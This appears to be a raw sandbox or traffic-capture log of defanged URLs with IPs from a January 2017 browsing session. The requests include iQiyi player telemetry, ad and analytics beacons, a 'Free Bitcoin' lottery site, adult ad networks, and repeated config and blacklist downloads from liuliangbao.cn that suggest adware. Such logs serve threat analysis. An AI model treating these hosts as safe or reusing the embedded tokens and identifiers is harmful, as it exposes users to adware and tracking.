hxxp://www-google-analytics.l.google.com/collect?v=1&_v=j47&a=634634703&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AACAAEAAI~&jid=&cid=150513197.1484906118&tid=UA-70454598-1&z=2073781349
hxxp://api.geetest.com/get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=70635a5a34b073f557c9bcaabf1c81ec&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906140926	198.11.176.80
hxxp://anycast-europe.quantserve.com.akadns.net/pixel;r=995029119;a=p-pV8razYeGyZwj;fpan=0;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=
hxxp://api.geetest.com/refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ecii&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143579	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ec6q&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143640	198.11.176.80
hxxp://cltres.liuliangbao.cn/clt/config/GlobalConfig_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js	173.194.113.205
hxxp://static.iqiyi.com/js/player_v1/pcweb.wonder.js
hxxp://edge.quantserve.com/quant.js	212.30.134.161
hxxp://cltres.liuliangbao.cn/clt/config/cfg_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_helkJjAewu65OsBLgXRnmTvc3AVFJ-nBZMBU9KtqCZLcy-AbNWPYbf7GmNI2lEK32K0VG9tOWibFGYRxkdwLZs5Z_dpN_c2yorTnWLFwdrSIdgMAMNTUw9-xMvBUaHYCIPzc6pDoco1r_7AkBO7zWbf-wMIKHXW9-KGCLr2eNRdOXZFm96vsDuT6fi5nGdSRbTIXyUNUHw5PAioQCMVkoQplfyQWGcuT8fsDo6aV3YKw5o9EnGZ8z8EJoHWXYsHF8mFFwAQx4F1XtsLGWJS-OiGzF9KGKQmrCd_NuB4fMXjbIsdGYDd50APKO2_iqR3Qp5xUWJB2hTbvkbU7C0R1d1TNpcFply462Nm5gG0IbFXACnMqE3nLLbIwETMolAEJR8&v=404&seq=7	106.39.169.66
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=load&prgr=0&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.22120652068406343	106.38.219.49
hxxp://px.3.cn/prices/mgets?skuids=J_10263952097,J_1014668736,J_1712213997,J_1683079458,J_10481689014,J_2823639,J_10293479220,J_2631300,J_1002498991,J_10666538087,J_1612802959,J_1319192906,J_10654177939,J_1767125187,J_10292956874,J_1311634685,J_10608382784,J_1031724397&type=1&callback=dsp_1484906111088&r=1484906111107	111.206.230.21
hxxp://static.iqiyi.com/js/lib/sea1.2.js
hxxp://msg.71.am/tmpstats.gif?type=piaoshhtestmayttf&des=find_Q_ready&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1238272289	106.38.219.49
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=vrld&vms=1&tl=2539&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.12644612696021795	106.38.219.49
hxxp://pagead2.googlesyndication.com/pagead/js/r20170116/r20170110/show_ads_impl.js	173.194.113.205
hxxp://b.scorecardresearch.com/b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=	217.212.238.42
hxxp://pixel.quantserve.com/pixel;r=1302890811;a=p-pV8razYeGyZwj;fpan=1;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=	95.172.94.59
hxxp://static.iqiyi.com/js/pingback/iwt.js
hxxp://irs01.com/crossdomain.xml	139.219.132.210
hxxp://nl.notice.iqiyi.com/apis/msg/hasnew.action?count=5&agent_type=1&callback=window.Q.__callbacks__.cb3onixz	222.173.56.34
hxxp://nlwl.iqiyi.com/apis/urc/getqd?authcookie=null&containsUgc=1&agent_type=1&subTypes=1,7,9&channelIds=1,2&callback=window.Q.__callbacks__.cbji48aq	123.125.111.85
hxxp://msg.71.am/cp2.gif?ps=0&h=0&ri=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&oi=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&p=i&s=1484906115563&di=0:n1,88,5000000911968,:1000000005931;&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://app.cointraffic.in/js/pnd2/script.packed.js	37.0.25.88
hxxp://msg.71.am/jpb.gif?rdm=1738841934&qtcurl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&rfr=&lrfr=DIRECT&jsuid=o5rodndzg8of8s4mwfefai5c&qtsid=1484906110,1484906110,1484906110,1&ppuid=&platform=11&fcode=&ffcode=&coop=&weid=11d91127a84babbf6dabdf9e702b5f03&pru=&fvcode=&mod=cn_s&tmplt=bodantplt&flshuid=5088e17771f6d54476f95dc61f9e80b4&as=c6ef95c1f39a49124dae509aae8e1a88	106.38.219.49
hxxp://t7z.cupid.iqiyi.com/crossdomain.xml	101.227.200.11
hxxp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	116.207.117.87
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9	106.39.169.66
hxxp://www.google-analytics.com/analytics.js	172.217.20.174
hxxp://static.trafficjunky.net/js/marketplace.min.js	205.185.208.85
hxxp://static.iqiyi.com/js/common/52ba69c7b1d54420bec46c52cec587c6.js
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he9IK0zj-LilCRyIGNw1kitd8XCIJu4Ib482Juro__479AUxpU8Df2fi-fQzKtSBnuwH-MVzd9FU8gOZlxlgfuwhfXAH7eBcC4JPMuv7GPXIy5H6gl9t1AHhoBDab6lSrK2hGmB9VSACPHoeXmattKj2FxyzAvW-kl6pOZ9FECT3hiXOWmOEGWzBFFP7FEgw2XkdeskaSCWNzoJUvCYRix5cGUhpe-tJkLjG3b6cWv6BLpg0FSYhNA6_xbdlUStbXW_eT7FI2G2829RaOJ4Cg2UNe5vaswjY5D6nGwYjrdWrFbZcKjkLM8sjUk0cn6CyI6rdSkdq2ECosvv9Tk13C4xfcX4ALs1iT1psPlXO0Zun2sMkJbvIKg5Q3SUwTvcH-b&v=404&seq=6	106.39.169.66
hxxp://static-alias-1.360buyimg.com/jzt/temp/js/_J.1.2.min.js	192.229.133.187
hxxp://p.tanx.com/ex?i=mm_26632162_2469125_22346699	106.11.93.16
hxxp://msg.71.am/b?t=21&u=5088e17771f6d54476f95dc61f9e80b4&pu=null&pf=1&bstp=24_dmfc&p2=1011&qpid=572044000&aid=0&block=1409011_dm&p=10&p1=101&_=2134069781	106.38.219.49
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=1070368555&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AAgAAEAAI~&jid=181594928&cid=150513197.1484906118&tid=UA-70454598-1&_r=1&z=1010198880	172.217.20.174
hxxp://irs01.com/irt?_iwt_id=null&_iwt_UA=UA-iqiyi-100009&jsonp=SetIDA0&_iwt_p1=A-0-0&_iwt_p2=572044000&_iwt_p3=56-0-0-0&_iwt_p4=787ab6983c8a883fa3c5190ce3cac804&_iwt_p5=&_iwt_muid=5088e17771f6d54476f95dc61f9e80b4&r=5889	139.219.132.210
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heEnmDgzEgJtbifhOVPNJDZL6mH1RGK8un5EUb_9dOg2LZm5QrA9b6KN-vXxSfzlPcMjoWBWB2Qi4sH93q7P68fKkAAFjL92af8brD9oOnSmt21L8iRmx_VVVc5QzQnuJiLqMVVudbR0NjyzLkTwqwEXN4scuxPw9hAirzu5jtOf4jwortaew7ipPMC0QuHuM33WD46Le0Ah331azG5hFqVzyu30AH1QsCnIPhwy44crCrLdRkmS6JAgqn-ZsgEAAXZsn4spVbueuUvN5eqLh_fEhs6XE-Aj-rUVIQhXt8o8OCExHVX9CCAPXguqrBMbysrUEQySUQPfJa6J5KiRS7hgjReGDX_6K_HenD3hEg7_xIRqfNClH-V7eA5dXazejC&v=404&seq=3	106.39.169.66
hxxp://cltres.liuliangbao.cn/clt/config/blhash_6.5.dat.zip	61.153.110.5
hxxp://www.onlylady.com/files/onlyladyomd_new2.php	37.29.13.39
hxxp://www.iqiyi.com/player/cupid/common/clear.swf?r=xv1v5n
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=activeplay&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.4783940138295293	106.38.219.49
hxxp://t7z.cupid.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU0QPA19QcQMeBAcWVWIEBxZXUwtARThFDQEWXAxtAQQEAQAGQVJ5Xw0AFkBeYgEWQEAPBlcTLAwAFkBGDG4XQQ1IWwxAU28BAAAAAAFvBAMGHlFCS1NkS1kKAQABbwEAAAICBkdQbx1TRAoACiVYCgECAgZBU28BAAAAAwhzUkQKAglMGFluAQAAAAABbwEAAAYCGhIXZQELSlkKAG8BAAACAgZBU2wDARxTRAtvF0NGDwEYR1BxARZFXA1ZK0VACh0dQQYUcVhBWUlZHzxeXR9EbQdIES1QA1pEBwFxWURdXhRATFN5R1VZVA0IZ1cDVgIKAkJaPAcIUwlSBGhTAwUAAlBBVWYHVlICUxcoDAAWSw8G&h=1484906114377&s=8f6f04431c47096fdb4b10b9161f986a	101.227.200.11
hxxp://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=140707adinit&pla=11&mod=cn_s&tn=0.23817403800785542	106.38.219.49
hxxp://static-alias-1.360buyimg.com/jzt/libs/behavior/v2/behavior.js	192.229.133.187
hxxp://cache.video.qiyi.com/sci/gm/3/572044000/?src=1702633101b340d8917a69cf8a4b8c7c	106.38.219.21
hxxp://static.iqiyi.com/js/qiyiV2/ugcBodanPlay_ver.js?3leiavi
hxxp://cltres.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://adspaces.ero-advertising.com/banads/view.php?spaceid=2168566
hxxp://mixer.video.iqiyi.com/jp/mixin/videos/572044000?callback=window.Q.__callbacks__.cbae6bg&status=1	106.38.219.21
hxxp://msg.71.am/vpb.gif?flag=stuenv&plyrver=3.3.12.9&pla=11&os=Windows 7&browser=MSIE&dpi=1276X846&flashver=WIN 23,0,0,185&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.4808125551789999	106.38.219.49
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he4eNkbQAXSVjSzyFW81pDZ1LQvRk0CVy9J18PeJAbVVt-IMC1Zl8l1WjWIKsObHQmfGpfbZyKbox8daLfvnzv-6kCE7nnFtZ3paiDX_-ZsB8MuOjgvFxwEQr8ayg0miQDuoxxxoh7E4Gd6pZxmF9AGchxt3FyQ8IGgTXhFf4aSOO2YdX2qGA5tfgMvXwz7YD21LeOReOWn5in9ya3T5q9mXTvU4J_aADuR2ne1UtxV3ZpKoaYgF0LScgRk1v50wpzWtQUBhjCXsPr2gs89m6NGFVIVT1MXAW1ITtUq2JnutP1epFGIuAh8bpninXTA140cE_nlxrycHwdZYnlyJfnsELu7IoeclyYRYdr2Z8s7RKZmdOeYrJ7saFdudE3V1Rj&v=404&seq=5	106.39.169.66
hxxp://msg.71.am/vpb.gif?flag=startvisits&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.2609360576607287	106.38.219.49
hxxp://www.google-analytics.com/collect?v=1&_v=j47&a=634634703&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AACAAEAAI~&jid=&cid=150513197.1484906118&tid=UA-70454598-1&z=2073781349	172.217.20.174
hxxp://nsclick.baidu.com/v.gif?pid=324&qiyi_cookie=&t=1484906112271	115.239.211.92
hxxp://static.iqiyi.com/js/qiyiV2/20170119180153/common/common.js
hxxp://static.iqiyi.com/js/common/ares2.min.js?1484906115570
hxxp://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf
hxxp://static.iqiyi.com/js/player_v1/config/online.js
hxxp://data.video.qiyi.com/uid?tn=0.4324387479573488	222.173.57.193
hxxp://js.passport.qihucdn.com/11.0.1.js?fa1c7fce79127597cbed202ea98aec2c	87.245.198.83
hxxp://static.geetest.com/static/js/geetest.0.0.0.js	198.11.176.80
hxxp://b.scorecardresearch.com/b?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=	217.212.238.42
hxxp://static.iqiyi.com/crossdomain.xml
hxxp://s2.qhimg.com/static/ab77b6ea7f3fbf79.js	52.222.174.9
hxxp://www.iqiyi.com/common/flashplayer/20161122/182321793893.swf
hxxp://atanx.alicdn.com/t/tanxssp.js?_v=12	195.27.31.250
hxxp://b.scorecardresearch.com/b?c1=1&c2=7290408&c3=10&c4=11&c5=&c6=&c7=http://www.iqiyi.com/v_19rra3jt70.html&c8=&c9=&c10=&c11=5088e17771f6d54476f95dc61f9e80b4	217.212.238.42
hxxp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	116.207.117.87
hxxp://data.video.qiyi.com/uid?tn=0.016473443247377872	222.173.57.193
hxxp://push.zhanzhang.baidu.com/push.js	61.135.162.21
hxxp://data.video.qiyi.com/uid?tn=0.896643178537488	222.173.57.193
hxxp://cache.video.qiyi.com/crossdomain.xml	106.38.219.21
hxxp://msg.71.am/cp2.gif?ps=0&rd=1170&h=0&p=s&rc=1&s=1484906115563&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://meta.video.qiyi.com/20161122/3a/3c/0ad38a6488686acc96d4ec67497a33b9.xml?tn=0.09199875919148326	2.21.89.89
hxxp://www.iqiyi.com/player/cupid/common/clear.swf?r=6yuxxr
hxxp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback	106.39.169.66
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hemtZz9E4T5Ml0FxIsOi7b9e6CUfixrWj0zyePKODPs2fGk99YKgmd96V7bd6iaxaASWVta4Uw2mVxa4JJOvd72JpgyGS2PR8XsdZpL87BcDLqEmShyhjsRfsafQQCZPFA_hKVZqjQdX3ELYetFcbXVAqCVOv1PdrOCh9nJwGQ_nznrRLps1ozknMgd89vuQqyu2i2zBsgyoqwlq3M2Ei-nUNOiBXoVGinGT2gWsz02E60z1_fh9cnGM_ZO7FTFH5ur-yg7X3l5JNppNRnOcHHgQMIr1IchhqvYCJpDCaDLQ8X-7NyDg5ouL6a6ILIEXLFe7KV8Q7Jc_-mR7kLuhqxXj3OZDFLEZECiJ1zoySaZfcuRvd5f3QK8YEjeW6nSRRe&v=404&seq=4	106.39.169.66
hxxp://hm.baidu.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&et=0&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=1570361624&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1&tt=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº	220.181.7.190
hxxp://t7z.cupid.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU1MPBlcAOwwAFlNGDGofAx4AHAJGRTsMABZVUQxuF1dEDwMQHV5vF14NABZBMAwBFkJAC0FFL0INABZAR2IAFkEPUUJLUnlCRg0DHgdsHwAWR14LGRcrQQofH0dGKB9ZQVtLX18AMFwfRm8BCC1DUQNYRgFBTTdFXVwWRgxvF0ZVW1YLSFs5AlYACAQCZlIGCFELVERUPQIFAgBWAWkIBlZQAFVXFGIBFkkNAA==&h=1484906112411&s=60d34018ac24eb58180b7eb57af7bbf5	101.227.200.11
hxxp://s.360.cn/so/zz.gif?url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&sid=fa1c7fce79127597cbed202ea98aec2c&token=feaq1ccc7qfkcrer79911=2t7s5i9l7?	180.163.251.231
hxxp://static.geetest.com/static/golden/style.3.2.0.css	198.11.176.80
hxxp://msg.71.am/vpb.gif?flag=plyract&plyract=ready&purl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&vvfrmtp=manclick&rfr=&lrfr=DIRECT&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.8087925375439227	106.38.219.49
hxxp://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heyLT0pUyDiycWLTHdeJJaAdRT4maqHQLm9Y0AoCVAtZFJmB0rLnPKe4Awt6Yb-DkFjW8GmYsoqfjuDFyd-_33gEKpi2PHNuN-K8WV-zOdz9qxfzUr9BQGPFQ71MpT1UOK20_jRDH2XBUi6uJfEYhV9I3WMZWOKqr8vXvqhXEwLNLQk2B9X7RuULD4wZcA4WJD7s9GaHjd_JwDEtxobOrxX2D8KGBYiZSpTER0cZ8YEvjn2jqHCVe-dJp14Mc2F6Zszm6zwTXyROtTHpyWjCtYpY1kQe_wR-fcV_vEag-5GxfIq3O9uZYW4SQvx94a1YipoLuLAFXviTZpLe_1WYbMdepAHZNPONGVwjzQqaL89TcPXZiM0TCTEI1-H1A-2ljb&v=404&seq=2	106.39.169.66
hxxp://www.qiyipic.com/common/fix/default_player_16_9.png?arg=01000011010000000000	2.21.89.72
hxxp://search.video.qiyi.com/m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b	124.192.153.77
hxxp://msg.71.am/b?t=20&p=10&p1=101&pf=1&block=B&r=&pu=null&u=5088e17771f6d54476f95dc61f9e80b4&jsuid=o5rodndzg8of8s4mwfefai5c&ce=11d91127a84babbf6dabdf9e702b5f03&re=1504*175629&clkx=0&clky=0&mod=cn_s&tm=8205&tmplt=dianshijunewtmplt&qpid=572044000&rseat=608241_cls_default&_=1166079991	106.38.219.49
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hebtboSJ6LnIVrJSLFTFAor6VibSw4roh9pVbMZp9UcE8uIoVcWJijeAaMqIiza0gk14gOAuJt5BfBvNg_B0OM4DdUu5kuIzf2jvfzxWGhvqSoIXIN5Zsxd5XfxO6X9nF8C6KTWUFOCcu2k-Y_sjHFjrhTRV5VyRzvC3wmInmnXYGXJTZIdnAjyfzOhwuYrGE8d_t79q2bd1hawuJc__CcDSM4Vqm-MSDgNPASm8mE09PgVXumdj8hkrzimh_Rd2RRvNxxus369cMbtIMMIcIvTvF_Ru1wbI9R7YfGziPepiLZu9Sl1LX_rGaA3-bqb_BcQFWaNWM1rqad5eXbrCMtxvTHnL6i2KVYpZpKCKZbOUMhYuHYOuvjDcPqd0w1NRwx&v=404&seq=8	106.39.169.66
hxxp://msg.71.am/cp2.gif?ps=0&h=0&p=i&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0	106.38.219.49
hxxp://freemomboy.com/trade	198.255.112.250
hxxp://www.qiyipic.com/crossdomain.xml	2.21.89.72
hxxp://im-x.jd.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heAb1y8zHhESL05A9jqTN-_xcs6r_ygqa3471hOG2sKfIoo7D2VlowD6Maz-72y8SXfViIdJoaCoS_HPHWJSJDgiGrhcZWBxoUmZ9yyAUMmAo_4aO-ZoVQIQcqIq-yVmKRLtJco4qPxA4XtzpCIBjYyorLiBoLIAbbhd5F0JwLQyDI1lcJyYG-HWtHsKJeo7I1r0b8QXL_sw_iYZQsMnHbXby88qZA7AezNilyO5VjcFnX2hpHyuTKOGiqqeXNKCrRPxeulH-BdCgVIuHM5x2gT2GaRlDqGb8cKpM6du77WlaXoBegrJBDJ8tLBQr2k7TWUMtFrguvyHrXDYXGCSbDyvKIMa_aNdiw8xJyZcXWxfc9Gnr6sRGca4wBnDoeinYT&v=404&seq=1	106.39.169.66
hxxp://cache.video.qiyi.com/vms?key=fvip&src=1702633101b340d8917a69cf8a4b8c7c&tvId=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&vinfo=1&tm=952&qyid=&puid=&authKey=bc6811ba189dbccef005d66f72770de2&um=0&pf=b6c13e26323c537d&thdk=&thdt=&rs=1&k_tag=1&qdx=n&qdv=2&vf=746cf15c43ca5b06081b3fa8a82442b0	106.38.219.21
hxxp://msg.71.am/tmpstats.gif?type=piaoshhtestmayttf&job=ugcbodanplay&des=findpagebyjob&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&entry=Q.load&prj=qiyiV2&_=1776244267	106.38.219.49
hxxp://msg.71.am/tmpstats.gif?type=yhls20130924&usract=sunkuotest&tn=1484906108169&yhls=1573105147225&fuid=&juid=&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201&ver=&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1484906108170	106.38.219.49
hxxp://cltres.liuliangbao.cn/clt/config/bl_6.5.dat?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6	61.153.110.5
hxxp://msg.video.qiyi.com/vodpb.gif?url=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&tag=done&curl=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&useTime=1154&dur=5644	36.110.220.15
